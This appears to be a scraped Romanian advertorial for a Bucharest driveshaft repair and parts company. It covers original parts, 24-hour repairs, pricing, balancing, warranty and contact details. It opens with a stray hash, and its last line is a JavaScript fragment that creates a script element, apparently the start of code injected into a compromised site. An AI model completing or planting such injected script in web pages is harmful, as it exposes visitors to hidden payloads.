2f915e7b5ce5077c99371e46dd006043Cauti o firma specializata in reparatii cardane? Ai nevoie de siguranta maxima in trafic si vrei sa gasesti firma cea mai sigura? Esti contra timp si ai nevoie de reparatii in doar o zi? Vrei servicii de calitate si echipamente de ultima generatie? Eurocardan Reparatii este solutia pentru tine.

Reparatii cardane rapide si doar cu piese originale

Iata cateva motive pentru care sa alegi serviciile oferite de Eurocardan Reparatii.

Cel mai important este ca la Eurocardan Reparatii toate defectiunile se remediaza prin inlocuirea elementelor defecte doar cu piese originale. Niciodata nu vor fi reconditionate piesele vechi. Chiar si in cazul in care piesele sunt asamblate prin sudura, reparatia se face prin taierea elementelor defecte si inlocuirea lor cu piese noi originale. Piesele de schimb se pot achizitiona de la Eurocardan in conditii de maxima siguranta.

Apeland la Eurocardan Reparatii, clientii beneficiaza de termene de executie foarte bune, de doar 24 de ore. Orice reparatie poate fi remediata in maxim acest interval. In timpul reparatiilor, la Eurocardan sunt folosite echipamente moderne, iar angajatii sunt specializati in acest domeniu.

Preturile sunt avantajoase in comparatie cu orice oferta de pe piata, devizul final al unei reparatii ajungand la maxim 50% din valoarea unui cardan nou de o calitate similara cu a celui reparat. Fiecare reparatie in parte va fi evaluata in urma testarii pe un banc pentru a specifica exact problema autoturismului. Tariful final contine costul pieselor de schimb si manopera.

Reparatii cardane este un serviciu oferit de Eurocardan in cele mai competitive conditii de pe piata, cu echipament de ultima generatie si personal calificat.

Dupa reparatie, se verifica buna functionare in conditii de rulaj printr-o procedura de echilibrare dinamica. Lucrarea de reparatie include si un termen de garantie pe parcursul careia clientul poate veni la Eurocardane de ori cate ori are nevoie.

Toate cele de mai sus reprezinta argumente imbatabile care recomanda Eurocardan Reparatii pentru reparatii cardane indiferent ca este vorba de autoturisme, autoutilitare, camioane, vehicule off-road, masini agricole sau aplicatii industriale.

Vanzari piese de schimb si reparatii cardane prin cei de la Eurocardane.ro

In magazinul online Eurocardane.ro poti gasi piese auto potrivite autoturismului tau. Magazinul online ofera cardane noi pentru toate tipurile de autovehicule, dar si servicii de reparatii in conditii excelente si folosind doar piese originale de schimb, inlocuind in totalitate elementele defecte si refacand apoi intreg mecanismul de functionare.

Firma din spatele magazinului virtual este Danival Auto cu sediul in Bucuresti. Investitia in echipamente moderne de lucru si in mana de lucru specializata plaseaza compania in topul firmelor prestatoare de servicii de reparatii cardane din Romania. Aceste preocupari pentru servicii ireprosabile tin de dorinta de a oferi clientilor masini 100% functionale si o siguranta perfecta in trafic.

Daca ai nevoie de piese de schimb originale, de la Eurocardan le poti achizitiona in conditii foarte bune. Reprezentantii Eurocardan se ocupa de o livrare rapida si in conditii optime de transport. Puteti beneficia de consultanta din partea angajatilor Eurocardan apeland numerele de telefon 0741 633 766 si 0724 789 734 sau scriind un e-mail la una din adresele eurocardane@yahoo.com sau eurocardane@gmail.com.var d=document;var s=d.createElement(‘script’);